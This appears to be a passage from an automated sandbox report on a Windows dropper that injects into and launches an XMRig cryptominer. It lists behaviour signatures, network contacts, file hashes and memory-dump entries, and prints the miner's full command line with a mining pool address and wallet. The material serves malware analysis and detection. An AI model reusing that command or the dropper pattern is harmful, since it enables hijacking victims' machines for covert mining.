eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2068 wrote to memory of 3472 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 2068 wrote to memory of 3472 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 52.111.227.14:443 | tcp | |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.143.182.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/3472-16-0x000001D721790000-0x000001D7217B0000-memory.dmp
memory/3472-17-0x000001D723180000-0x000001D7231A0000-memory.dmp
memory/3472-18-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-21-0x000001D7231C0000-0x000001D7231E0000-memory.dmp
memory/3472-20-0x000001D7231A0000-0x000001D7231C0000-memory.dmp
memory/3472-19-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-22-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-23-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-24-0x000001D7231A0000-0x000001D7231C0000-memory.dmp
memory/3472-25-0x000001D7231C0000-0x000001D7231E0000-memory.dmp
memory/3472-26-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-27-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-28-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-29-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-30-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-31-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-32-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-33-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-34-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-35-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-36-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-37-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-38-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-39-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-40-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-41-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-42-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-43-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-44-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-45-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-46-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-47-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-48-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-49-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-50-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-51-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-52-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-53-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-54-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-55-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-56-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-57-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-58-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-59-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-60-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-61-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-62-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-63-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-64-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-65-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-66-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-67-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-68-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-69-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-70-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-71-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-72-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-73-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-74-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-75-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-76-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-77-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-78-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-79-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-80-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-81-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-82-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-83-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-84-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp